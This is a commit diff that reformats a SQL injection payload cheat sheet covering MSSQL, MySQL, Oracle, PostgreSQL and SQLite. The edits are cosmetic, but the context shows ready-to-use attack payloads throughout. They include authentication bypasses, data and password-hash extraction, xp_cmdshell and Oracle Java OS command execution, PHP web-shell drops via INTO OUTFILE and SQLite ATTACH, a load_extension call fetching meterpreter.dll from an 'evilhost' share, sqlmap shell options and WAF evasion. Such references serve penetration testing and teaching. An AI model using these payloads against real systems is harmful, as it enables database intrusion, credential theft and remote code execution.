Markdown formatting update

SQL injection/MSSQL Injection.md

@@ -1,22 +1,26 @@
 # MSSQL Injection
 
 ## MSSQL version
+
 ```sql
 SELECT @@version
 ```
 
 ## MSSQL database name
+
 ```sql
 SELECT DB_NAME()
 ```
 
 ## MSSQL List Databases
+
 ```sql
 SELECT name FROM master..sysdatabases;
 SELECT DB_NAME(N); — for N = 0, 1, 2, …
 ```
 
 ## MSSQL List Column
+
 ```sql
 SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
 SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
@@ -25,6 +29,7 @@ SELECT table_catalog, column_name FROM information_schema.columns
 ```
 
 ## MSSQL List Tables
+
 ```sql
 SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
 SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
@@ -33,8 +38,8 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master.
 SELECT table_catalog, table_name FROM information_schema.columns
 ```
 
-
 ## MSSQL User Password
+
 ```sql
 MSSQL 2000:
 SELECT name, password FROM master..sysxlogins
@@ -46,6 +51,7 @@ SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.
 ```
 
 ## MSSQL Error based
+
 ```sql
 For integer inputs : convert(int,@@version)
 For integer inputs : cast((SELECT @@version) as int)
@@ -54,8 +60,8 @@ For string inputs   : ' + convert(int,@@version) + '
 For string inputs   : ' + cast((SELECT @@version) as int) + '
 ```
 
-
 ## MSSQL Blind based
+
 ```sql
 SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
 
@@ -64,6 +70,7 @@ SELECT message FROM data WHERE row = 1 and message like 't%'
 ```
 
 ## MSSQL Time based
+
 ```sql
 ProductID=1;waitfor delay '0:0:10'--
 ProductID=1);waitfor delay '0:0:10'--
@@ -75,18 +82,23 @@ IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'                              com
 ```
 
 ## MSSQL Stacked Query
+
 Use a semi-colon ";" to add another query
+
 ```sql
 ProductID=1; DROP members--
 ```
 
 ## MSSQL Command execution
+
 ```sql
-EXEC xp_cmdshell "net user";           
+EXEC xp_cmdshell "net user";
 EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
 EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
 ```
+
 If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
+
 ```sql
 EXEC sp_configure 'show advanced options',1
 RECONFIGURE
@@ -95,11 +107,13 @@ RECONFIGURE
 ```
 
 ## MSSQL Make user DBA (DB admin)
+
 ```sql
 EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
 ```
 
 ## Thanks to
- * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
- * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
- * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
+
+* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
+* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
+* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)

SQL injection/MySQL Injection.md

@@ -1,6 +1,7 @@
 # MYSQL Injection
 
-## MySQL Comment
+## MySQL 
+
 ```sql
 # MYSQL Comment
 /* MYSQL Comment */
@@ -9,7 +10,9 @@
 ```
 
 ## Detect columns number
+
 Using a simple ORDER
+
 ```sql
 order by 1
 order by 2
@@ -19,6 +22,7 @@ order by XXX
 ```
 
 ## MySQL Union Based
+
 ```sql
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
@@ -27,12 +31,14 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 
 ## MySQL Error Based - Basic
+
 ```sql
 (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
 ```
 
 ## MYSQL Error Based - UpdateXML function
+
 ```sql
 AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
 AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
@@ -42,12 +48,14 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) F
 ```
 
 Shorter to read:
+
 ```sql
 ' and updatexml(null,concat(0x0a,version()),null)-- -
 ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
 ```
 
 ## MYSQL Error Based - Extractvalue function
+
 ```sql
 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
@@ -57,7 +65,9 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
 ```
 
 ## MYSQL Blind using a conditional statement
+
 TRUE: `if @@version starts with a 5`:
+
 ```sql
 2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 Response:
@@ -65,6 +75,7 @@ HTTP/1.1 500 Internal Server Error
 ```
 
 False: `if @@version starts with a 4`:
+
 ```sql
 2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
 Response:
@@ -72,6 +83,7 @@ HTTP/1.1 200 OK
 ```
 
 ## MYSQL Blind with MAKE_SET
+
 ```sql
 AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
 AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
@@ -80,29 +92,32 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```
 
 ## MYSQL Time Based
+
 ```sql
 +BENCHMARK(40000000,SHA1(1337))+
 '%2Bbenchmark(3200,SHA1(1))%2B'
 ' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 
 AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))  //SHA1
-RLIKE SLEEP([SLEEPTIME])                                           
-OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))                     
+RLIKE SLEEP([SLEEPTIME])
+OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
 ```
 
-
 ## MYSQL Read content of a file
+
 ```sql
 ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
 ```
 
 ## MySQL DIOS - Dump in One Shot
+
 ```sql
 (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
 (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
 ```
 
 ## MYSQL DROP SHELL
+
 ```sql
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
 SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>

SQL injection/OracleSQL Injection.md

@@ -1,11 +1,13 @@
 # Oracle SQL Injection
 
 ## Oracle SQL version
+
 ```sql
 SELECT user FROM dual UNION SELECT * FROM v$version
 ```
 
 ## Oracle SQL database name
+
 ```sql
 SELECT global_name FROM global_name;
 SELECT name FROM V$DATABASE;
@@ -14,17 +16,20 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
 ```
 
 ## Oracle SQL List Databases
+
 ```sql
 SELECT DISTINCT owner FROM all_tables;
 ```
 
 ## Oracle SQL List Column
+
 ```sql
 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
 ```
 
 ## Oracle SQL List Tables
+
 ```sql
 SELECT table_name FROM all_tables;
 SELECT owner, table_name FROM all_tables;
@@ -39,8 +44,7 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
 | CTXSYS.DRITHSX.SN     | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
 | Invalid XPath         | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
 | Invalid XML           | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual |
-| Invalid XML	          | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |
-
+| Invalid XML           | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |
 
 ## Oracle SQL Blind
 
@@ -53,11 +57,13 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
 | First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
 
 ## Oracle SQL Time based
+
 ```sql
 AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])                 comment:   -- /**/
 ```
 
 ## Oracle SQL Command execution
+
 ```sql
 /* create Java class */
 BEGIN
@@ -73,6 +79,7 @@ END;
 /* run OS command */
 SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
 ```
+
 or (hex encoded)
 
 ```sql
@@ -85,4 +92,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
 ```
 
 ## Thanks to
- * [Heavily taken inspired by - NetSpi SQL Wiki ](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
+
+* [Heavily taken inspired by - NetSpi SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)

SQL injection/PostgreSQL Injection.md

@@ -1,13 +1,15 @@
 # POSTGRESQL
 
 ## PostgreSQL Comments
-```
+
+```sql
 --
 /**/  
 ```
 
 ## PostgreSQL Error Based - Basic
-```
+
+```sql
 ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
 ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
 ,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
@@ -15,7 +17,8 @@
 ```
 
 ## PostgreSQL Time Based
-```
+
+```sql
 AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
-AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) 
+AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
 ```

SQL injection/README.md

@@ -1,7 +1,9 @@
 # SQL injection
+
 A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
 
 ## Summary
+
 * [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
 * [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
 * [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
@@ -16,10 +18,11 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t
 * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
 * [WAF Bypass](#waf-bypass)
 
-
 ## Entry point detection
+
 Detection of an SQL injection entry point
 Simple characters
+
 ```sql
 '
 %27
@@ -34,12 +37,14 @@ Wildcard (*)
 ```
 
 Multiple encoding
+
 ```sql
 %%2727
 %25%27
 ```
 
 Merging characters
+
 ```sql
 `+HERP
 '||'DERP
@@ -50,7 +55,8 @@ Merging characters
 ```
 
 Logic Testing
-```
+
+```sql
 page.asp?id=1 or 1=1 -- true
 page.asp?id=1' or 1=1 -- true
 page.asp?id=1" or 1=1 -- true
@@ -58,7 +64,8 @@ page.asp?id=1 and 1=2 -- false
 ```
 
 Weird characters
-```
+
+```sql
 Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
 transformed into U+0022 QUOTATION MARK (")
 Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
@@ -66,6 +73,7 @@ transformed into U+0027 APOSTROPHE (')
 ```
 
 ## DBMS Identification
+
 ```c
 ["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
 ["connection_id()=connection_id()"                 ,"MYSQL"],
@@ -94,27 +102,31 @@ transformed into U+0027 APOSTROPHE (')
 ["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
 ```
 
-
 ## SQL injection using SQLmap
+
 Basic arguments for SQLmap
-```
+
+```powershell
 sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
 ```
 
 Custom injection in UserAgent/Header/Referer/Cookie
-```
+
+```powershell
 python sqlmap.py -u "http://example.com" --data "username=admin&password=pass"  --headers="x-forwarded-for:127.0.0.1*"
 The injection is located at the '*'
 ```
 
 Second order injection
-```
+
+```powershell
 python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
 ```
 
 Shell
-```
+
+```powershell
 SQL Shell
 python sqlmap.py -u "http://example.com/?id=1"  -p id --sql-shell
 
@@ -126,12 +138,14 @@ python sqlmap.py -u "http://example.com/?id=1"  -p id --os-pwn
 ```
 
 Using suffix to tamper the injection
-```
+
+```powershell
 python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
 ```
 
 General tamper option and tamper's list
-```
+
+```powershell
 tamper=name_of_the_tamper
 ```
 
@@ -184,6 +198,7 @@ tamper=name_of_the_tamper
 |xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
 
 ## Authentication bypass
+
 ```sql
 '-'
 ' '
@@ -277,19 +292,22 @@ admin") or "1"="1"/*
 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 ```
 
-
 ## Polyglot injection (multicontext)
+
 ```sql
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 ```
 
-## Second order injection
+## Routed injection
+
 ```sql
 admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
 ```
 
 ## Insert Statement - ON DUPLICATE KEY UPDATE
+
 ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
+
 ```sql
 Inject using payload:
   attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
@@ -303,10 +321,10 @@ Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL
 After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
 ```
 
-
 ## WAF Bypass
 
 No Space (%20) - bypass using whitespace alternatives
+
 ```sql
 ?id=1%09and%091=1%09--
 ?id=1%0Dand%0D1=1%0D--
@@ -317,16 +335,19 @@ No Space (%20) - bypass using whitespace alternatives
 ```
 
 No Whitespace - bypass using comments
+
 ```sql
 ?id=1/*comment*/and/**/1=1/**/--
 ```
 
 No Whitespace - bypass using parenthesis
+
 ```sql
 ?id=(1)and(1)=(1)--
 ```
 
 No Comma - bypass using OFFSET, FROM and JOIN
+
 ```sql
 LIMIT 0,1         -> LIMIT 1 OFFSET 0
 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
@@ -334,6 +355,7 @@ SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE
 ```
 
 Blacklist using keywords - bypass using uppercase/lowercase
+
 ```sql
 ?id=1 AND 1=1#
 ?id=1 AnD 1=1#
@@ -341,6 +363,7 @@ Blacklist using keywords - bypass using uppercase/lowercase
 ```
 
 Blacklist using keywords case insensitive - bypass using an equivalent operator
+
 ```sql
 AND   -> &&
 OR    -> ||
@@ -350,6 +373,7 @@ WHERE -> HAVING
 ```
 
 Information_schema.tables Alternative
+
 ```sql
 select * from mysql.innodb_table_stats;
 +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
@@ -367,10 +391,10 @@ mysql> show tables in dvwa;
 | guestbook      |
 | users          |
 +----------------+
-
 ```
 
 Version Alternative
+
 ```sql
 mysql> select @@innodb_version;
 +------------------+
@@ -394,37 +418,36 @@ mysql> mysql> select version();
 +-------------------------+
 ```
 
-
-
 ## Thanks to - Other resources
+
 * Detect SQLi
-  - [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
-  - [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
+  * [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
+  * [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
 * MySQL:
-  - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
-  - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
-  - [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
-  - [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
+  * [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
+  * [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
+  * [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
+  * [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
 * MSSQL:
-  - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
-  - [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
+  * [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
+  * [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
 * ORACLE:
-  - [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
+  * [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
 * POSTGRESQL:
-  - [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
+  * [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
 * Others
-  - [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
-  - [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
-  - [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
-  - [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
-  - [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
-  - [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
-  - [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
-  - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
-  - [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
-  - [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
+  * [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
+  * [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
+  * [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
+  * [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
+  * [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
+  * [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
+  * [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
+  * [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
+  * [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
+  * [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
 * Second Order:
-  - [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
-  - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
+  * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
+  * [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
 * Sqlmap:
-  - [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
+  * [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)

SQL injection/SQLite Injection.md

@@ -1,53 +1,64 @@
 # SQLite Injection
 
 ## SQLite comments
+
 ```sql
 --
 /**/
 ```
 
 ## SQLite version
+
 ```sql
 select sqlite_version();
 ```
 
 ## Integer/String based - Extract table name
+
 ```sql
 SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
 ```
+
 Use limit X+1 offset X, to extract all tables.
 
 ## Integer/String based - Extract column name
+
 ```sql
 SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
 ```
 
 For a clean output
+
 ```sql
 SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
 ```
 
 ## Boolean - Count number of tables
+
 ```sql
 and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
 ```
 
 ## Boolean - Enumerating table name
+
 ```sql
 and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
 ```
 
 ## Boolean - Extract info
+
 ```sql
 and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
 ```
 
 ## Time based
+
 ```sql
 AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
 ```
 
 ## Remote Command Execution using SQLite command - Attach Database
+
 ```sql
 ATTACH DATABASE '/var/www/lol.php' AS lol;
 CREATE TABLE lol.pwn (dataz text);
@@ -55,10 +66,13 @@ INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
 ```
 
 ## Remote Command Execution using SQLite command - Load_extension
+
 ```sql
 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
 ```
+
 Note: By default this component is disabled
 
 ## Thanks to
+
 [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)